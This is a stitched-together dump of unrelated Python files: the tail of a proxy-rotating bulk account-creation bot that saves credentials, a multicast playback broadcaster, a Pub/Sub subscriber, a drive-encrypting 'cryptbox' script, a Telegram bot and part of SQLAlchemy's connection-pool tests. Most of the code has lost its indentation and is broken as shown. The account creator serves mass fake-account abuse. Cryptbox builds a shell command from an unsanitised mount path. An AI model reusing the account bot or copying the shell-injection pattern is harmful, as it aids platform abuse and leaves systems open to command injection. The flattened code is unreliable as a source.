self.write('%s[%sCREATED%s] %s:%s | Username: %s | Gender: %s | Date of Birth: %s/%s-%s' % (green(), reset(), green(), email, password, username, gender.replace(gender[0], gender[0].upper()), birth_day, birth_month, birth_year))
with open('Created [RAW].txt', 'a', encoding = 'UTF-8') as f: f.write('%s:%s\n' % (email, password))
with open('Created [CAPTURE].txt', 'a', encoding = 'UTF-8') as f: f.write('%s:%s | Username: %s | Gender: %s | Date of Birth: %s/%s-%s\n' % (email, password, username, gender.replace(gender[0], gender[0].upper()), birth_day, birth_month, birth_year))
self.variables['created'] += 1
else:
self.retry()
else:
self.retry()
except:
self.retry()
def multi_threading(self):
self.start = time()
Thread(target = self.cpm_counter).start()
Thread(target = self.update_title).start()
if self.variables['unlimited']:
while True:
try:
Thread(target = self.creator, args = (self.variables['proxies'][self.variables['proxy_num']],)).start()
except:
continue
self.variables['proxy_num'] += 1
if self.variables['proxy_num'] >= len(self.variables['proxies']):
self.variables['proxy_num'] = 0
else:
num = 0
while num < int(self.amount):
try:
Thread(target = self.creator, args = (self.variables['proxies'][self.variables['proxy_num']],)).start()
except:
continue
num += 1
self.variables['proxy_num'] += 1
if self.variables['proxy_num'] >= len(self.variables['proxies']):
self.variables['proxy_num'] = 0
while self.variables['created'] != int(self.amount):
continue
print('\n%s> %sFinished%s.' % (reset(), green(), reset()))
system('pause >NUL')
print('> Exiting . . .')
sleep(3)
_exit(0)
if __name__ == '__main__':
main = Main()
main.setup()
main.multi_threading()
|
broadcaster.py
|
import socket
import struct
from time import time, sleep
from threading import Thread
from dbus import DBusException
DEFAULT_PORT = 1666
DEFAULT_HOST = '224.0.0.160'
DEFAULT_INTERVAL = 1.0 # seconds
class Broadcaster:
def __init__(self, omxplayer, verbose=False, interval=DEFAULT_INTERVAL, host=DEFAULT_HOST, port=DEFAULT_PORT,
background=True, interface=None):
# config
self.player = omxplayer
self.verbose = verbose if type(verbose) is bool else False
self.interval = interval if type(interval) in (int, float) else DEFAULT_INTERVAL
host = self.test_host(host)
port = port if type(port) is int else DEFAULT_PORT
self.multicast = (host, port)
self.background = background if type(background) is bool else True
self.interface = interface
# attributes
self.socket = None
self.next_broadcast_time = 0
self.update_thread = None
self.message = " "
while self.setup() is False:
sleep(1)
if self.background is True:
self.start_thread()
def __del__(self):
self.destroy()
    def test_host(self, host):
        # validate that host looks like a dotted-quad IPv4 address;
        # otherwise fall back to the default multicast group
        try:
            host_test = host.split('.', 3)
            if len(host_test) == 4 and all(0 <= int(item) <= 255 for item in host_test):
                return host
        except (ValueError, AttributeError):
            pass
        return DEFAULT_HOST
def setup(self):
# create socket connections
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
ttl = struct.pack('b', 32)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
        # optionally bind the socket to a specific network interface
        # (socket option 25 is SO_BINDTODEVICE on Linux)
if self.interface is not None:
self.socket.setsockopt(socket.SOL_SOCKET, 25, self.interface)
def start_thread(self):
self.update_thread = Thread(target=self.update_loop)
self.update_thread.start()
def destroy(self):
if self.socket:
self.socket.close()
self.socket = None
def update_loop(self):
while True:
try:
self.update()
except DBusException:
self.socket.close()
break
def update(self):
t = time()
# time for next broadcast?
if t >= self.next_broadcast_time:
# broadcast
self._broadcast_position()
# "schedule" next broadcast
self.next_broadcast_time = t + self.interval
def _broadcast_position(self):
duration = self.player.duration()
playback_status = self.player.playback_status()
p = self.player.position()
if not p and not duration and not playback_status:
return
try:
self.socket.sendto(("%s%%%s%%%s" % (str(p), duration, playback_status)).encode('utf-8'), self.multicast)
self.message = 'broadcast position: %.2f/%.2f Playback:%s' % (p, duration, playback_status)
except socket.error:
self.message = "Network is unreachable"
if self.verbose:
print(self.message)
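# Illustrative sketch, not part of the original module: a minimal blocking
# receiver for the single-'%'-separated "position%duration%status" datagrams
# produced by _broadcast_position() above.
def example_receive_position(host=DEFAULT_HOST, port=DEFAULT_PORT):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('', port))
    # join the multicast group on all interfaces
    mreq = struct.pack('4sl', socket.inet_aton(host), socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    try:
        data, _ = sock.recvfrom(1024)
        position, duration, status = data.decode('utf-8').split('%')
    finally:
        sock.close()
    return float(position), float(duration), status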
|
pull_subscriber.py
|
# -*- coding: utf-8 -*-
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import threading
import signal
import time
from pubsub_controller.settings import (
GCP_PROJECT_ID,
POLLING_TIME,
SUBSCRIPTION_ID,
)
from pubsub_controller.utils.log import log, error_log
from pubsub_controller.subscriber.pull.subscribe_multi import SubscribeMulti
SUBSCRIPTION_NAME = 'projects/' + GCP_PROJECT_ID + '/subscriptions/{unique}'
def subscribe_multi():
"""
メッセージを受け取って指定されたClassを実行する
Pub/subメッセージのattributeに {target: ClassName} を指定すると、
ClassNameのmainメソッドを実行する。
"""
SubscribeMulti.pull(SUBSCRIPTION_NAME.format(unique=SUBSCRIPTION_ID))
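# Illustrative publisher-side sketch (topic name and class name are
# hypothetical, not part of this module): a message that subscribe_multi()
# would route to SomeTask.main():
#
#     from google.cloud import pubsub_v1
#     publisher = pubsub_v1.PublisherClient()
#     topic_path = publisher.topic_path(GCP_PROJECT_ID, "some-topic")
#     publisher.publish(topic_path, b"payload", target="SomeTask")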
def subscriber_all_close(end=False):
"""
全てのSubscriberをCloseする。
"""
SubscribeMulti.close(end)
def sync_stop_subscriber(end=False):
"""
全てのSubscriberを停止する。(同期)
:param end: Subscriberを完全に終了するかどうか。
"""
t = threading.Thread(target=subscriber_all_close, args=(end,))
t.start()
t.join(timeout=60)
def main():
"""
常駐プロセスとして起動する。
指定されたSubscriberをThreadとして起動する。
"""
log('Start Pull Subscriber.')
def signal_handler(signum, stack):
"""
受け取ったSIGNALに応じて終了処理をハンドリングする。
:param signum: default
:param stack: default
"""
sync_stop_subscriber(end=True)
log('Stop Pull Subscriber. signal by {}'.format(signum))
exit(0)
    # Register handlers for the relevant signals
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
threads = []
try:
threads.append(subscribe_multi)
for thread in threads:
t = threading.Thread(target=thread)
t.start()
        # Periodically close and reopen the subscribers
while True:
time.sleep(POLLING_TIME)
sync_stop_subscriber()
except Exception as e:
error_log('Error Pull Subscriber. ... {}'.format(e))
exit(1)
if __name__ == '__main__':
main()
|
cryptbox.py
|
import os
import sys
import getpass
import pyinotify
import time
import argparse
import enum
import threading
import subprocess
import encrypt
if getpass.getuser() == "pi":
import RPi.GPIO as GPIO
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, public_key, led_manager):
self.public_key = public_key
self.led_manager = led_manager
def process_IN_CREATE(self, event):
if os.path.isdir(event.pathname):
print("New mounted volume detected: " + event.pathname)
# Wait for the volume to be mounted and avoid permission errors
time.sleep(1)
# Encrypt the volume
self.led_manager.set_state(CryptBoxState.ENCRYPTING)
try:
encrypt.run(event.pathname, event.pathname, self.public_key)
print("Finished volume encryption: " + event.pathname)
except Exception as e:
print(e)
self.led_manager.set_state(CryptBoxState.ERROR)
# Unmount the volume
try:
print("Syncing")
run_system_cmd("sync")
print("Unmounting " + event.pathname)
run_system_cmd("umount " + event.pathname)
except Exception as e:
print(e)
self.led_manager.set_state(CryptBoxState.ERROR)
# If everything went well, indicate success through the LED state
if self.led_manager.get_state() == CryptBoxState.ENCRYPTING:
self.led_manager.set_state(CryptBoxState.IDLE)
class CryptBoxState(enum.Enum):
""" CryptBox's operational states """
IDLE = 0
ENCRYPTING = 1
ERROR = 2
class RpiLed():
def __init__(self, pin):
""" Representation of a single LED connected to an RPi.
Arguments:
pin The RPi pin with BOARD numbering
"""
self.led_pin = pin
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.led_pin, GPIO.OUT)
GPIO.output(self.led_pin, GPIO.LOW)
def turn_on(self):
GPIO.output(self.led_pin, GPIO.HIGH)
def turn_off(self):
GPIO.output(self.led_pin, GPIO.LOW)
class LedManager():
def __init__(self, main_thread):
""" LED Manager's constructor, sets pin up using RPi.GPIO. """
# Monitor the main thread to stop if it has stopped
self.main_thread = main_thread
# Set the type of LED to use
self.led = RpiLed(40) if getpass.getuser() == "pi" else None
# Set the initial operational state
self.state = CryptBoxState.IDLE
def set_state(self, state):
""" Set the operational state using CryptBoxState. """
self.state = state
def get_state(self):
""" Get the currently set CryptBoxState. """
return self.state
def run(self):
""" The main business logic of the LED Manager.
        Contains a blocking loop that controls the LED based on the internal
state machine.
"""
# If the LED type is not defined, then do nothing
if not self.led:
return
# Blink the LED differently depending on the operational state
while self.main_thread.is_alive():
if self.state == CryptBoxState.IDLE:
self.led.turn_on()
elif self.state == CryptBoxState.ENCRYPTING:
self.led.turn_on()
time.sleep(0.1)
self.led.turn_off()
time.sleep(1)
elif self.state == CryptBoxState.ERROR:
self.led.turn_on()
time.sleep(0.1)
self.led.turn_off()
time.sleep(0.3)
def run_system_cmd(cmd):
""" Run system command using the shell.
Arguments:
cmd The shell command to be run
Return:
        0 Command was executed successfully
1 Command failed during execution
"""
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT,
shell=True, universal_newlines=True)
except subprocess.CalledProcessError as e:
print("ERROR:\n\n%s" % e.output)
return 1
return 0
def main():
parser_description = "CryptBox: Encrypt your drives on the fly"
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument("--mountpoint",
help="Path to where new volumes are mounted",
required=True)
parser.add_argument("--public-key",
help="Path to the public key", required=True)
args = parser.parse_args()
if not os.path.isdir(args.mountpoint):
print("Mountpoint does not exist or not a directory:", args.mountpoint)
sys.exit(1)
# Setup the Led Manager
main_thread = threading.current_thread()
led_manager = LedManager(main_thread)
led_thread = threading.Thread(target=led_manager.run)
led_thread.start()
# Setup pyInotify
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_CREATE # watched events
notifier = pyinotify.Notifier(wm, EventHandler(args.public_key,
led_manager))
wdd = wm.add_watch(args.mountpoint, mask)
notifier.loop() # Blocking loop
led_thread.join()
if __name__ == "__main__":
main()
|
main.py
|
import settings
import telebot
import time
import threading
import logging
from compragamer import compragamer
logging.basicConfig(level=logging.INFO)
bot = telebot.TeleBot(settings.TOKEN)
chatids = []
@bot.message_handler(commands=['start', 'help'])
def start_help_handler(message):
logging.debug(msg="start received from {id}".format(id="message.chat.id"))
bot.reply_to(message, "hello!")
@bot.message_handler(commands=['ask'])
def ask_handler(message):
logging.debug(msg="ask received from {id}".format(id="message.chat.id"))
chatids.append((message.chat.id, message.text.partition(' ')[2]))
bot.reply_to(message, "ok")
def botpolling():
logging.info("Start Polling")
bot.polling()
threading.Thread(target=botpolling).start()
while True:
for id, criteria in chatids:
cg = compragamer()
articulos = cg.search(criteria)
for articulo in articulos:
bot.send_message(id, articulo)
time.sleep(int(settings.INTERVAL))
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
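# Orientation note for the tests below: MockDBAPI().connect() hands back a
# fresh Mock connection, and shutdown(True) swaps connect() for one that
# raises, simulating a database outage until shutdown(False) restores it.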
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_threadconns",
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append("checkin")
event.listen(p, "checkin", checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.requires.predictable_gc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ["checkin"])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
        # not have made it to the "checkout()" event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
reaper = testing.engines.ConnectionKiller()
reaper.add_pool(p)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
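        # status() reports (pool size, checked-in, overflow, checked-out);
        # overflow() starts at -pool_size and climbs as connections are
        # created beyond the fixed pool size.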
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
reaper.assert_all_closed()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
